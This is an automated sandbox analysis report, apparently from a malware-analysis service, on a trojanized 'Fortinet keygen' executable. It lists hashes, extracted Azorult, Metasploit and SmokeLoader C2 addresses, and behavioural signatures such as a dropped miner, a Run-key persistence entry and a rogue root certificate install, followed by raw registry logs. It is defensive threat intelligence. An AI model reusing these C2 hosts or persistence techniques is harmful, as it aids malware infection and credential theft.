Analysis
-
max time kernel
298s -
max time network
298s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
02-04-2021 21:10
Static task
static1
Behavioral task
behavioral1
Sample
Fortinet.v1.0.keygen.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Fortinet.v1.0.keygen.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Fortinet.v1.0.keygen.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Fortinet.v1.0.keygen.exe
Resource
win10v20201028
General
-
Target
Fortinet.v1.0.keygen.exe
-
Size
5.4MB
-
MD5
2a2be5dbf78e57ac4fd460faa2a52488
-
SHA1
8e0791500aeb17c4dc950e1a8c90d6036fb49d5b
-
SHA256
b66f057295395c28f1dd0d6807ac2c174885235d63ab3f3ff5b3d87719780228
-
SHA512
8715562e1b9e7c2357f95f3beb66383de7ec16d4dfbf7f0230a922ea420d27378e22ced50ee9d7e0da30a05bf269d5a07ca1a736b1b0828f3afbdfc8c10b9038
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral2/memory/1504-228-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral2/memory/1504-229-0x0000000005120000-0x0000000005A2A000-memory.dmp family_glupteba behavioral2/memory/1504-230-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
XMRig Miner Payload 4 IoCs
resource yara_rule behavioral2/memory/756-167-0x00000001402CA898-mapping.dmp xmrig behavioral2/memory/756-180-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/756-162-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/756-243-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 13 IoCs
pid Process 3228 keygen-pr.exe 1872 keygen-step-1.exe 4088 keygen-step-3.exe 4436 keygen-step-4.exe 1236 key.exe 1492 Setup.exe 2476 multitimer.exe 2524 setups.exe 2956 askinstall20.exe 2596 setups.tmp 4460 Full Program Features.exe 4028 multitimer.exe 1648 multitimer.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp -
Loads dropped DLL 7 IoCs
pid Process 2596 setups.tmp 2596 setups.tmp 2596 setups.tmp 2596 setups.tmp 2596 setups.tmp 2596 setups.tmp 2596 setups.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\bkz3eohfhna = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\8HM9QH3MH1\\multitimer.exe\" 1 3.1617397880.60678878e55ec" multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 31 ip-api.com 89 api.ipify.org 118 ipinfo.io 120 ipinfo.io 181 api.ipify.org 264 ipinfo.io 268 ipinfo.io 435 api.ipify.org -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum Three.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 Three.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\unins0000.dat Full Program Features.exe File created C:\Program Files\unins0000.dll Full Program Features.exe File created C:\Program Files\unins.vbs Full Program Features.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new Three.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new Three.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 28 IoCs
pid pid_target Process procid_target 1484 3244 WerFault.exe 119 5256 3244 WerFault.exe 119 5504 3244 WerFault.exe 119 5596 3244 WerFault.exe 119 5828 3244 WerFault.exe 119 5956 3244 WerFault.exe 119 5296 3244 WerFault.exe 119 6936 5608 WerFault.exe 163 6328 5608 WerFault.exe 163 6508 5608 WerFault.exe 163 5644 6656 WerFault.exe 230 6796 6656 WerFault.exe 230 6664 5608 WerFault.exe 163 5496 6656 WerFault.exe 230 4480 6656 WerFault.exe 230 6956 5608 WerFault.exe 163 5568 5608 WerFault.exe 163 7020 6656 WerFault.exe 230 6304 5608 WerFault.exe 163 6576 5608 WerFault.exe 163 6212 5372 WerFault.exe 149 7084 5608 WerFault.exe 163 6736 5608 WerFault.exe 163 5300 5608 WerFault.exe 163 6828 6656 WerFault.exe 230 1100 6656 WerFault.exe 230 7176 5608 WerFault.exe 163 6392 5608 WerFault.exe 163 -
Delays execution with timeout.exe 1 IoCs
pid Process 4472 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Three.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer Three.exe -
Kills process with taskkill 5 IoCs
pid Process 2156 taskkill.exe 7724 taskkill.exe 7760 taskkill.exe 5164 taskkill.exe 1060 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 010000008dc8c7031db9bb5f77e372e97670847265a5da27a172a78ce2c6822c1e961b8c74c400726665b22b99fe29108aca48978db0d46c1d3f25cab8ba MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{E556DBC8-7EAA-40F2-B1B6-11E57B9CA587}" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{C0986F80-ABB5-4260-A413-8A47B0C6A581} = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 35234e3a0428d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 7777ff390428d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings Full Program Features.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000d2162a954c222eb358aa9f8e2f0b82c132f92568230b89c96141e32bed5afa9da1da03b603f6093417d03fef12be52418d7f5a15cd97dffc1f3c7e98668af41bd5ebb3707be3c3f42da9343f39521b7c6b63304cc00cc372c17bb26db1ea6c5ca8695b3a4089f98ef55746bba767de98cec30af8590b664fb82003939b1cf1b0f2749303ed87567ffcfaf9fbcf9d906156c1cca6c1326d1be94a39d024bf6a9efb2c7dbd9b7f8f8e3fb3dbf1c194fedfed7b71bb6c2333337b19f781af7210b535b2c1b39010bac5bba0179e79edd3052713b36cd77cb0c53dad499da2d71c8e3b249eb5e7dae6f496e2bee302460f6aafa78c96f9deb263d82523053b8d47c812a3840c8d7d90cb1c9a8b101b40cb100659205c5bea7e1b8fa3e22f9433cb1b344f01461c99237b03e671f7f47b0a469347a094ba3ef72909460a18e86bc17c1d482dcd60cedbf3dfe74e47de97428be593480e657ce337422e4e8740d4ec4d0cae21500abce2a3b9bdd83b9c34b48c6b5cf09efc4273298a7afba2a90de7a141a1a1fb580350d35f897a9972f3ef3094c113030f32197bba184fa6c09704db4c76c1a42627 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0